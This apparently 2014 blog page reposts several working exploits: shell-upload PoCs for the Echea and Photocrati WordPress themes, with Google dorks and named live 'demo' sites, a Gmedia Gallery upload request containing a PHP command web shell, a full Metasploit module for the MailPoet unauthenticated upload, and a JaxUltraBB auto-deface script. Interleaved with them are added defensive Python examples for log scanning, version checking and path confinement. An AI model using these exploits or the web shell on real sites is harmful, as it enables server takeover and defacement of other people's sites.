Saturday, 30 August 2014

Wordpress Theme Echea Shell Upload Vulnerability





############################################################################
# Title : Wordpress Theme Echea Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 15/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.themeforest.net                                                     
# Google Dork : inurl:/wp-content/themes/echea/
# Tested on : Linux
                        
############################################################################
Exploit:
<?php
$uploadfile="shell.php.jpg";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg
Demo:http://yanaselandscaping.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################
# 120773CDEC4B3C62   1337day.com [2014-08-31]   BF54DAAA2B06D615 #

Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability



############################################################################
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 13/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.photocrati.com                                                       
# Google Dork : inurl:/wp-content/themes/photocrati-theme-v4.07/
# Tested on : Linux                       
############################################################################
Exploit:
<?php
   
$uploadfile="shell.php";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
  print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php
Demo:http://www.tanguygilson.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################

Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability



######################
# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.codeasily.com/
# Date : 2014-08-01
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description : 
Any user could upload php files (administrator by default).
######################
# Vulnerability Disclosure Timeline:
2014-08-01:  Discovered vulnerability
2014-08-01:  Vendor Notification (Twitter)
2014-08-01:  Vendor Response/Feedback
2014-08-02:  Vendor Fix/Patch
2014-08-02:  Public Disclosure
######################
# PoC:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Content-Length=916
Content-Type=multipart/form-data; boundary=---------------------------304431219031197
Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------304431219031197
Content-Disposition: form-data; name="name"
.shell.php
-----------------------------304431219031197
Content-Disposition: form-data; name="chunk"
0
-----------------------------304431219031197
Content-Disposition: form-data; name="chunks"
1
-----------------------------304431219031197
Content-Disposition: form-data; name="params"
terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D=
-----------------------------304431219031197
Content-Disposition: form-data; name="file"; filename=".shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>
-----------------------------304431219031197--
Backdoor location:
#####################
Discovered By : Claudio Viviani
                http://www.homelab.it
                info@homelab.it
                homelabit@protonmail.ch
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
#####################
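The three advisories above end the same way: a PHP file sits under a theme or upload directory that the web server will happily execute, hidden behind a double extension (custom_shell.php.jpg), a leading dot (.shell.php) or nothing at all (shell.php). As an added detection example, not part of any of the advisories and written in Python rather than PHP, the script below scans web-server access logs for requests to PHP-looking files below such writable trees. The log format, the list of prefixes, the extra /wp-content/uploads/wysija/themes/ line for the MailPoet module further down, and every sample line are constructed assumptions.

```python
import re
from typing import Iterable, List, NamedTuple

# Combined-log-format parser (assumed log shape; constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Any dot-separated segment after the first that names a PHP handler. This catches
# shell.php, .shell.php (leading dot) and shell.php.jpg (double extension, executed
# by Apache configurations that map every extension of a name to its handler).
PHP_SEGMENT = re.compile(r"^(php\d?|phtml|phar)$")

# Directories WordPress or a theme writes at runtime; no PHP should ever be served
# from them. The theme paths are the ones named in the advisories above; the
# uploads prefix also covers /wp-content/uploads/wysija/themes/ used by MailPoet.
WRITABLE_PREFIXES = (
    "/wp-content/uploads/",
    "/wp-content/themes/echea/js/cufon-fonts/uploaded/",
    "/wp-content/themes/photocrati-theme-v4.07/admin/scripts/",
)


class Hit(NamedTuple):
    ip: str
    method: str
    path: str
    status: str
    prefix: str


def has_php_extension(filename: str) -> bool:
    """True if any extension position of the basename is a PHP extension."""
    segments = filename.lower().split(".")
    return any(PHP_SEGMENT.match(s) for s in segments[1:])


def scan_access_log(lines: Iterable[str]) -> List[Hit]:
    """Return every request for a PHP-looking file below a writable prefix.

    Non-200 responses are reported too: a 404 on such a path is a probe worth knowing about.
    """
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line; skip rather than crash
        path = m.group("path").split("?", 1)[0]   # drop the query string
        basename = path.rsplit("/", 1)[-1]
        for prefix in WRITABLE_PREFIXES:
            if path.startswith(prefix) and has_php_extension(basename):
                hits.append(Hit(m.group("ip"), m.group("method"), path, m.group("status"), prefix))
                break
    return hits


# Constructed sample log: addresses are documentation ranges, paths follow the advisories.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Aug/2014:10:00:01 +0000] "GET /wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg HTTP/1.1" 200 512
203.0.113.5 - - [31/Aug/2014:10:00:09 +0000] "GET /wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php HTTP/1.1" 200 230
198.51.100.7 - - [31/Aug/2014:10:01:00 +0000] "GET /wp-content/uploads/2014/08/photo.jpg HTTP/1.1" 200 81234
198.51.100.7 - - [31/Aug/2014:10:01:30 +0000] "GET /wp-content/uploads/wysija/themes/qwertyuiop/asdfghjklz.php HTTP/1.1" 200 0
192.0.2.9 - - [31/Aug/2014:10:02:00 +0000] "POST /wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.1" 302 0
192.0.2.9 - - [31/Aug/2014:10:02:10 +0000] "GET /wp-content/uploads/.shell.php?cmd=id HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{hit.ip} {hit.method} {hit.status} {hit.path}  (under {hit.prefix})")
```

Run against the sample it reports four of the six lines: the two theme shells, the MailPoet-style payload under uploads/wysija/themes, and the 404 probe for .shell.php; the legitimate photo.jpg and the POST to admin-post.php are left alone. The same prefix list is the one to deny PHP execution in (a per-directory handler removal or `php_flag engine off`), which turns every one of these hits into a harmless download.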

Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload



Description:
The WordPress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7 is vulnerable to an unauthenticated file upload. The exploit uses the theme upload functionality to upload a zip file containing the payload. The plugin used the admin_init hook without knowing that the hook is also executed for unauthenticated users when the right URL is called.
Usage info:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
msf exploit(wp_wysija_newsletters_upload) > show targets
...targets...
msf exploit(wp_wysija_newsletters_upload) > set TARGET <target-id>
msf exploit(wp_wysija_newsletters_upload) > show options
...show and set options...
msf exploit(wp_wysija_newsletters_upload) > exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated file Upload',
      'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
is vulnerable to an unauthenticated file upload. The exploits uses the upload Theme
functionality to upload a zip file containing the payload. The plugin used the
admin_init hook without knowning the hook is also executed for unauthenticated
users when calling the right URL.
},
      'Author' =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer' # metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
        ],
      'Privileged' => false,
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jul 1 2014'))
  end

  def create_zip_file(theme_name, payload_name)
    # the zip file must match the following:
    # -) Exactly one folder representing the theme name
    # -) A style.css in the theme folder
    # -) Additional files in the folder

    content = {
      File.join(theme_name, 'style.css') => '',
      File.join(theme_name, payload_name) => payload.encoded
    }

    zip_file = Rex::Zip::Archive.new
    content.each_pair do |name, content|
      zip_file.add_file(name, content)
    end

    zip_file.pack
  end

  def check
    readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
    res = send_request_cgi({
      'uri' => readme_url,
      'method' => 'GET'
    })
    # no readme.txt present
    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    end

    # try to extract version from readme
    # Example line:
    # Stable tag: 2.6.6
    version = res.body[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]

    # readme present, but no version number
    if version.nil?
      return Msf::Exploit::CheckCode::Detected
    end

    print_status("#{peer} - Found version #{version} of the plugin")

    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
      return Msf::Exploit::CheckCode::Appears
    else
      return Msf::Exploit::CheckCode::Safe
    end
  end

  def exploit
    theme_name = rand_text_alpha(10)
    payload_name = "#{rand_text_alpha(10)}.php"

    zip_content = create_zip_file(theme_name, payload_name)

    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-post.php')

    data = Rex::MIME::Message.new
    data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
    data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
    data.add_part('themeupload', nil, nil, 'form-data; name="action"')
    data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
    post_data = data.to_s

    payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)

    print_status("#{peer} - Uploading payload to #{payload_uri}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
      'data' => post_data
    })

    if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Files to cleanup (session is dropped in the created folder):
    # style.css
    # the payload
    # the theme folder (manual cleanup)
    register_files_for_cleanup('style.css', payload_name)

    print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")

    print_status("#{peer} - Executing payload #{payload_uri}")
    res = send_request_cgi({
      'uri' => payload_uri,
      'method' => 'GET'
    })
  end
end

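The module's check() above decides from the plugin's readme.txt whether a site runs a version before 2.6.7: no readme means Unknown, a readme without a Stable tag means Detected, an older tag means Appears, anything else Safe. As an added example for a site owner auditing their own installations (not part of the Metasploit module), here is that classification in Python. It takes the readme text as a string, so fetching /wp-content/plugins/wysija-newsletters/readme.txt is left to the caller; the readme fragments below are constructed, not real MailPoet files.

```python
import re
from typing import Optional, Tuple

# Version from which the admin_init upload path is fixed, per the advisory above.
FIXED_VERSION = "2.6.7"

# Same field the module's check() reads: the "Stable tag:" line of the plugin's readme.txt.
STABLE_TAG_RE = re.compile(r"stable tag:\s*([0-9][0-9A-Za-z.\-]*)", re.IGNORECASE)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.6.6' -> (2, 6, 6). Parsing stops at the first non-numeric piece ('2.6.7-beta' -> (2, 6, 7))."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def stable_tag(readme: str) -> Optional[str]:
    """Extract the advertised version, or None if the readme carries no numeric Stable tag."""
    m = STABLE_TAG_RE.search(readme)
    return m.group(1) if m else None


def assess_readme(readme: Optional[str]) -> str:
    """Classify one site with the same four outcomes the module's check() uses."""
    if readme is None:
        return "unknown"      # readme.txt not served: plugin absent, or file access blocked
    version = stable_tag(readme)
    if version is None:
        return "detected"     # plugin present, version not advertised (e.g. "Stable tag: trunk")
    if parse_version(version) < parse_version(FIXED_VERSION):
        return "appears"      # advertised version predates the fix
    return "safe"


# Constructed readme fragments (not real MailPoet readmes) covering the outcomes.
README_OLD = "=== MailPoet Newsletters ===\nStable tag: 2.6.6\nTested up to: 3.9\n"
README_FIXED = "=== MailPoet Newsletters ===\nStable tag: 2.6.7\n"
README_NO_TAG = "=== MailPoet Newsletters ===\nTested up to: 3.9\n"

if __name__ == "__main__":
    for name, text in [("old", README_OLD), ("fixed", README_FIXED), ("no tag", README_NO_TAG), ("missing", None)]:
        print(f"{name}: {assess_readme(text)}")
```

Tuple comparison gives the ordering one expects from version strings ((2, 6) sorts before (2, 6, 7), (2, 7) after it), which is close enough to the Gem::Version comparison the module uses for release numbers. A readme is only a hint: a site whose operator removed readme.txt, or who patched the hook without bumping the tag, will land in "unknown" or "detected", so treat those as "go and look" rather than "fine".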

JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit


=========================================================
JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit
=========================================================
#!/usr/bin/php -q -d short_open_tag=on
<?
print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::       
:+:    :+: :+:        :+:     :+:     :+:     :+:       
+:+    +:+ +:+        +:+     +:+     +:+     +:+       
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+       
+#+    +#+ +#+         +#+   +#+      +#+     +#+       
#+#    #+# #+#          #+#+#+#       #+#     #+#       
#########  ##########     ###     ########### ##########
::::::::::: ::::::::::     :::     ::::    :::: 
    :+:     :+:          :+: :+:   +:+:+: :+:+:+
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
    +#+     +#+        +#+     +#+ +#+       +#+
    #+#     #+#        #+#     #+# #+#       #+#
    ###     ########## ###     ### ###       ###
         
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
  
JaxUltraBB <= 2.0 (delete.php) Defaced Exploit
[Script name: JaxUltraBB 2.0
Find by: Kacper
or
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko., CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky
';
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      JaxUltraBB path
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /JaxUltraBB/
php '.$argv[0].' 2.2.2.2 /JaxUltraBB/ -P1.1.1.1:80
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
        }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$hauru='<STYLE =text/css>BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #eeeeee; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000
}
A:link {
COLOR: darkblue; TEXT-DECORATION: none
}
A:visited {
COLOR: #000088; TEXT-DECORATION: none
}
A:hover {
COLOR: #000000
}
body, td, th {
color: #000000;
}
table, p, td, tr
{
visibility:hidden;
}
body {
background-color: #000000;
}
</STYLE>
<script language="JavaScript">
var left="{";
var right="}";
var msg="  - - Hacked By DEVIL TEAM .:We Ownz You!:. - -  ";
var speed=200;
function scroll_title() {
document.title=left+msg+right;
msg=msg.substring(1,msg.length)+msg.charAt(0);
setTimeout("scroll_title()",speed);
}
scroll_title();
</script>';
$packet ="GET ".$p."delete.php?modtype=%3Cimg%20src=img/admin.jpg%3E&forum=../index.php&contents=".$hauru." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo "Site defaced ;] look to index.php";
?>
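Judging from the request the script above builds (forum=../index.php, the page body in contents, and the closing message pointing at index.php), delete.php turns a request parameter into a file path without confining it to the forum's data directory. As an added example that is not part of the exploit or of JaxUltraBB, here is the confinement check such a handler needs, in Python: an identifier whitelist plus a resolved-path check, each of which alone stops the traversal. The data directory layout, the .dat suffix and the function names are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# Identifier whitelist: a forum name is a short token, never a path fragment.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class UnsafePath(ValueError):
    """Raised when a request parameter would leave the data directory."""


def resolve_forum_file(data_dir: str, forum_name: str) -> Path:
    """Map a request-supplied forum identifier onto a file strictly inside data_dir.

    Two independent checks: the name must match the whitelist, and the resolved path
    (symlinks followed) must still sit below data_dir. Keeping both means a later
    relaxation of SAFE_NAME cannot silently reopen traversal.
    """
    if not SAFE_NAME.match(forum_name):
        raise UnsafePath(f"rejected forum identifier {forum_name!r}")
    base = Path(data_dir).resolve()
    target = (base / f"{forum_name}.dat").resolve()   # suffix is ours, never the caller's
    if base not in target.parents:
        raise UnsafePath(f"{target} is outside {base}")
    return target


def is_confined(data_dir: str, forum_name: str) -> bool:
    """Convenience wrapper: True if the identifier maps to a file inside data_dir."""
    try:
        resolve_forum_file(data_dir, forum_name)
        return True
    except UnsafePath:
        return False


def demo() -> dict:
    """Exercise the check against a constructed layout: data/general.dat beside an index.php."""
    with tempfile.TemporaryDirectory() as root:
        data = Path(root) / "data"
        data.mkdir()
        (data / "general.dat").write_text("forum contents")
        (Path(root) / "index.php").write_text("<?php // site front page ?>")
        candidates = ["general", "new-forum", "../index.php", "..", "/etc/passwd", "general.dat", ""]
        return {c: is_confined(str(data), c) for c in candidates}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name!r:16} {'allowed' if ok else 'rejected'}")
```

Only the plain identifiers are accepted; every traversal form, the absolute path and the empty string are refused before any file is opened. A handler that also writes request-supplied contents, as this one evidently does, should in addition require an authenticated moderator and a CSRF token, since the exploit needs neither.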
